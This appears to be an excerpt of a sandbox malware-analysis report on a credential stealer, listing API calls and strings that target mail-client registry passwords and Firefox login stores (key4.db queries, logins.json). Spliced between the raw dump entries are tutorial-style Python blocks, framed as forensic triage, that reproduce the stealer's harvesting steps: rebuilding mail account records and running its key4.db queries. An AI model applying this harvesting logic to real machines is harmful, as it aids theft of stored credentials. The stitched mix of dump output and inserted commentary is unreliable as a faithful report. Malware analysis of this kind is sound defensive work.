                          • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                          • API String ID: 2238633743-192783356
                          • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                          • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                          • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                          • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfileString_mbscmpstrlen
                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                          • API String ID: 3963849919-1658304561
                          • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                          • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                          • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                          • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@??3@memcpymemset
                          • String ID: (yE$(yE$(yE
                          • API String ID: 1865533344-362086290
                          • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                          • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                          • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                          • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                          APIs
                          • memset.MSVCRT ref: 0040EBD8
                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                          • memset.MSVCRT ref: 0040EC2B
                          • memset.MSVCRT ref: 0040EC47
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                          • memset.MSVCRT ref: 0040ECDD
                          • memset.MSVCRT ref: 0040ECF2
                          • _mbscpy.MSVCRT ref: 0040ED59
                          • _mbscpy.MSVCRT ref: 0040ED6F
                          • _mbscpy.MSVCRT ref: 0040ED85
                          • _mbscpy.MSVCRT ref: 0040ED9B
                          • _mbscpy.MSVCRT ref: 0040EDB1
                          • _mbscpy.MSVCRT ref: 0040EDC7
                          • memset.MSVCRT ref: 0040EDE1
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                          • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                          • API String ID: 3137614212-1455797042
                          • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                          • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                          • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                          • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                          APIs
                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                            • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                            • Part of subcall function 00408934: CloseHandle.KERNEL32(?), ref: 0040899C
                            • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                          • memset.MSVCRT ref: 0040E5B8
                          • memset.MSVCRT ref: 0040E5CD
                          • _mbscpy.MSVCRT ref: 0040E634
                          • _mbscpy.MSVCRT ref: 0040E64A
                          • _mbscpy.MSVCRT ref: 0040E660
                          • _mbscpy.MSVCRT ref: 0040E676
                          • _mbscpy.MSVCRT ref: 0040E68C
                          • _mbscpy.MSVCRT ref: 0040E69F
                          • memset.MSVCRT ref: 0040E6B5
                          • memset.MSVCRT ref: 0040E6CC
                            • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                            • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                          • memset.MSVCRT ref: 0040E736
                          • memset.MSVCRT ref: 0040E74F
                          • sprintf.MSVCRT ref: 0040E76D
                          • sprintf.MSVCRT ref: 0040E788
                          • _strcmpi.MSVCRT ref: 0040E79E
                          • _strcmpi.MSVCRT ref: 0040E7B7
                          • _strcmpi.MSVCRT ref: 0040E7D3
                          • memset.MSVCRT ref: 0040E858
                          • sprintf.MSVCRT ref: 0040E873
                          • _strcmpi.MSVCRT ref: 0040E889
                          • _strcmpi.MSVCRT ref: 0040E8A5
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                          • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                          • API String ID: 4171719235-3943159138
                          • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                          • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                          • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                          • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                          • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                          • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                          • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                          • GetWindowRect.USER32(00000000,?), ref: 0041047C
                          • GetWindowRect.USER32(?,?), ref: 00410487
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                          • GetDC.USER32 ref: 004104E2
                          • strlen.MSVCRT ref: 00410522
                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                          • ReleaseDC.USER32(?,?), ref: 00410580
                          • sprintf.MSVCRT ref: 00410640
                          • SetWindowTextA.USER32(?,?), ref: 00410654
                          • SetWindowTextA.USER32(?,00000000), ref: 00410672
                          • GetDlgItem.USER32(?,00000001), ref: 004106A8
                          • GetWindowRect.USER32(00000000,?), ref: 004106B8
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                          • GetClientRect.USER32(?,?), ref: 004106DD
                          • GetWindowRect.USER32(?,?), ref: 004106E7
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                          • GetClientRect.USER32(?,?), ref: 00410737
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                          • String ID: %s:$EDIT$STATIC
                          • API String ID: 1703216249-3046471546
                          • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                          • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                          • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                          • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                          APIs
                          • memset.MSVCRT ref: 004024F5
                            • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                          • _mbscpy.MSVCRT ref: 00402533
                          • _mbscpy.MSVCRT ref: 004025FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscpy$QueryValuememset
                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                          • API String ID: 168965057-606283353
                          • Opcode ID: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                          • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                          • Opcode Fuzzy Hash: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                          • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
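The value names in the string table above (HTTPMail/IMAP/POP3/SMTP Server, Port, User Name, Secure Connection, and Password2) are read through RegQueryValueExA in the subcall at 00410ADD, i.e. the function walks per-account registry keys of a mail client and collects server, port, user and the stored password blob. The following added example (not code from the report or from the sample) shows what such a harvest yields by reconstructing the same records from a Regedit 5.00 export, which is the form an analyst usually has during an investigation. The hive path in the constructed export and the helper names (`parse_reg_export`, `mail_accounts`) are assumptions; the excerpt does not show where the key lives. The DPAPI provider GUID check is a fixed property of CryptProtectData output.

```python
import re
from typing import Dict, List, Optional

# DPAPI blobs carry the provider GUID {DF9D8CD0-1501-11D1-8C7A-00C04FC297EB}
# in little-endian byte order; its presence inside Password2 shows the
# stored secret is CryptProtectData output rather than plaintext.
DPAPI_PROVIDER_GUID = bytes.fromhex("d08c9ddf0115d1118c7a00c04fc297eb")
PROTOCOLS = ("HTTPMail", "IMAP", "POP3", "SMTP")

# Constructed .reg export for the example. The hive path is an ASSUMPTION;
# the report only shows the value names the sample queries.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\ExampleMailClient\Profiles\00000002]
"Account Name"="work"
"POP3 Server"="pop.example.test"
"POP3 Port"=dword:000003e3
"POP3 User Name"="alice"
"POP3 Secure Connection"=dword:00000001
"SMTP Server"="smtp.example.test"
"SMTP Port"=dword:0000024b
"SMTP Email Address"="alice@example.test"
"Password2"=hex:02,00,00,00,01,00,00,00,d0,8c,9d,df,01,15,d1,11,8c,7a,00,c0,\
  4f,c2,97,eb,aa,bb,cc,dd

[HKEY_CURRENT_USER\Software\ExampleMailClient\Profiles\00000003]
"IMAP Server"="imap.example.test"
"IMAP Port"=dword:000003e1
"IMAP User Name"="bob"
'''


def _decode_value(data: str) -> object:
    """Decode one .reg value: REG_SZ ("..."), REG_DWORD (dword:), or
    REG_BINARY / typed hex (hex:, hex(7):). Anything else stays a string."""
    if data.startswith('"') and data.endswith('"'):
        return data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    if data.startswith("dword:"):
        return int(data[6:], 16)
    m = re.match(r"hex(?:\([0-9a-f]+\))?:(.*)$", data, re.I)
    if m:
        return bytes.fromhex(m.group(1).replace(",", " "))
    return data


def parse_reg_export(text: str) -> Dict[str, Dict[str, object]]:
    """Parse a Regedit 5.00 export into {key_path: {value_name: value}}.
    Backslash-continued hex lines are joined before parsing."""
    text = re.sub(r"\\\r?\n\s*", "", text)
    keys: Dict[str, Dict[str, object]] = {}
    current: Optional[Dict[str, object]] = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1], {})
        elif current is not None and line.startswith('"'):
            name, data = line.split("=", 1)
            current[name.strip().strip('"')] = _decode_value(data.strip())
    return keys


def mail_accounts(reg_text: str) -> List[Dict[str, object]]:
    """Rebuild the per-protocol records the sample's loop would collect:
    server, port, user, TLS flag, and whether a Password2 blob is present."""
    accounts: List[Dict[str, object]] = []
    for path, values in parse_reg_export(reg_text).items():
        pw = values.get("Password2")
        for proto in PROTOCOLS:
            server = values.get(f"{proto} Server")
            if server is None:
                continue
            accounts.append({
                "key": path,
                "protocol": proto,
                "server": server,
                "port": values.get(f"{proto} Port"),
                "user": values.get(f"{proto} User Name"),
                "secure": bool(values.get(f"{proto} Secure Connection", 0)),
                "email": values.get("SMTP Email Address"),
                "has_password2": isinstance(pw, bytes) and len(pw) > 0,
                "password2_is_dpapi": isinstance(pw, bytes)
                and DPAPI_PROVIDER_GUID in pw,
            })
    return accounts


if __name__ == "__main__":
    for acct in mail_accounts(SAMPLE_REG):
        print(acct)
```

Run against a real export of the affected user's mail profile keys, the output is the exact set of accounts whose server, user name and encrypted password the sample could have collected, which is what needs to be rotated after an infection.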
                          APIs
                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                          • LoadCursorA.USER32(00000067), ref: 0040115F
                          • SetCursor.USER32(00000000), ref: 00401166
                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                          • EndDialog.USER32(?,00000001), ref: 0040121A
                          • DeleteObject.GDI32(?), ref: 00401226
                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                          • ShowWindow.USER32(00000000), ref: 00401253
                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                          • ShowWindow.USER32(00000000), ref: 00401262
                          • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                          • memset.MSVCRT ref: 0040128E
                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                          • String ID:
                          • API String ID: 2998058495-0
                          • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                          • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                          • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                          • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcmp$memcpy
                          • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                          • API String ID: 231171946-2189169393
                          • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                          • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                          • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                          • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscat$memsetsprintf$_mbscpy
                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                          • API String ID: 633282248-1996832678
                          • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                          • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                          • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                          • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                          APIs
                          Strings
                          • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                          • key4.db, xrefs: 00406756
                          • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                          • , xrefs: 00406834
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memcmp$memsetstrlen
                          • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                          • API String ID: 3614188050-3983245814
                          • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                          • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                          • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                          • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                          • API String ID: 710961058-601624466
                          • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                          • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                          • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                          • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: sprintf$memset$_mbscpy
                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                          • API String ID: 3402215030-3842416460
                          • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                          • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                          • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                          • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                          APIs
                            • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                            • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000), ref: 00407B6E
                            • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                            • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                            • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                            • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                            • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                            • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                          • strlen.MSVCRT ref: 0040F139
                          • strlen.MSVCRT ref: 0040F147
                          • memset.MSVCRT ref: 0040F187
                          • strlen.MSVCRT ref: 0040F196
                          • strlen.MSVCRT ref: 0040F1A4
                          • memset.MSVCRT ref: 0040F1EA
                          • strlen.MSVCRT ref: 0040F1F9
                          • strlen.MSVCRT ref: 0040F207
                          • _strcmpi.MSVCRT ref: 0040F2B2
                          • _mbscpy.MSVCRT ref: 0040F2CD
                          • _mbscpy.MSVCRT ref: 0040F30E
                            • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                          • String ID: logins.json$none$signons.sqlite$signons.txt
                          • API String ID: 1613542760-3138536805
                          • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                          • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                          • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                          • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
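The two functions above together describe the Firefox credential path: the earlier one opens key4.db and issues `SELECT item1,item2 FROM metadata WHERE id = 'password'` (global salt and password-check blob) and `SELECT a11,a102 FROM nssPrivate` (the wrapped master key and its key id), while this one probes signons.txt, signons.sqlite and logins.json, the legacy and current login stores. The added example below (not code from the report or from the sample) reproduces that file probe and runs the same two SQL statements, so an analyst can see exactly which material the sample reads from a profile. It stops short of decrypting anything; unwrapping the key from a11 and decoding logins.json entries needs the NSS PBE/PKCS#11 logic, which is outside this excerpt. The profile it operates on is constructed in a temporary directory with a reduced key4.db schema (real nssPrivate has many more columns); the key id `f8 00 .. 01` is the value Firefox uses for the master key record.

```python
import json
import os
import sqlite3
import tempfile
from typing import Dict, List

# File names the sample probes, in the order its string table lists them.
FIREFOX_STORES = ("signons.txt", "signons.sqlite", "logins.json", "key4.db")

# The two statements observed in the dump, used verbatim.
SQL_PASSWORD_CHECK = "SELECT item1,item2 FROM metadata WHERE id = 'password'"
SQL_PRIVATE_KEYS = "SELECT a11,a102 FROM nssPrivate"


def present_stores(profile_dir: str) -> List[str]:
    """Which of the four credential stores exist in the profile."""
    return [n for n in FIREFOX_STORES if os.path.isfile(os.path.join(profile_dir, n))]


def read_key4_material(path: str) -> Dict[str, object]:
    """Run the sample's queries against key4.db. item1 is the global salt,
    item2 the password-check blob; a11 is the wrapped master key and a102
    its key id. Nothing is decrypted here."""
    con = sqlite3.connect(path)
    try:
        row = con.execute(SQL_PASSWORD_CHECK).fetchone()
        keys = con.execute(SQL_PRIVATE_KEYS).fetchall()
    finally:
        con.close()
    return {
        "global_salt": bytes(row[0]) if row else None,
        "password_check": bytes(row[1]) if row else None,
        "wrapped_keys": [(bytes(a11), bytes(a102)) for a11, a102 in keys],
    }


def read_logins(path: str) -> List[Dict[str, str]]:
    """List the still-encrypted login records from logins.json."""
    with open(path, "r", encoding="utf-8") as fh:
        data = json.load(fh)
    return [{"hostname": e["hostname"],
             "encryptedUsername": e["encryptedUsername"],
             "encryptedPassword": e["encryptedPassword"]}
            for e in data.get("logins", [])]


def triage_profile(profile_dir: str) -> Dict[str, object]:
    """Everything the sample's Firefox routine can reach in one profile."""
    report: Dict[str, object] = {"stores": present_stores(profile_dir)}
    key4 = os.path.join(profile_dir, "key4.db")
    if os.path.isfile(key4):
        report["key4"] = read_key4_material(key4)
    logins = os.path.join(profile_dir, "logins.json")
    if os.path.isfile(logins):
        report["logins"] = read_logins(logins)
    return report


def build_constructed_profile() -> str:
    """CONSTRUCTED profile directory: a key4.db with the two tables the
    queries touch (reduced schema) and a logins.json with placeholder
    blobs. No real credentials are involved."""
    d = tempfile.mkdtemp(prefix="ff_profile_")
    con = sqlite3.connect(os.path.join(d, "key4.db"))
    con.executescript("""
        CREATE TABLE metadata (id TEXT PRIMARY KEY, item1 BLOB, item2 BLOB);
        CREATE TABLE nssPrivate (id INTEGER PRIMARY KEY, a11 BLOB, a102 BLOB);
    """)
    con.execute("INSERT INTO metadata VALUES ('password', ?, ?)",
                (b"\x00" * 20, b"\x30\x2a" + b"\x01" * 40))
    # Master-key record: Firefox stores it under key id f8 00 .. 00 01.
    key_id = bytes.fromhex("f8000000000000000000000000000001")
    con.execute("INSERT INTO nssPrivate VALUES (1, ?, ?)",
                (b"\x30\x4e" + b"\x02" * 76, key_id))
    con.commit()
    con.close()
    with open(os.path.join(d, "logins.json"), "w", encoding="utf-8") as fh:
        json.dump({"nextId": 2, "logins": [{
            "id": 1, "hostname": "https://mail.example.test",
            "encryptedUsername": "CONSTRUCTED-BASE64-USER",
            "encryptedPassword": "CONSTRUCTED-BASE64-PASS"}]}, fh)
    return d


if __name__ == "__main__":
    print(triage_profile(build_constructed_profile()))
```

On a live host the same probe order tells you which store to preserve first: a profile with only signons.sqlite or signons.txt is a legacy layout, while logins.json plus key4.db is the current one, and in both cases the key database is what makes the encrypted entries recoverable.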
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
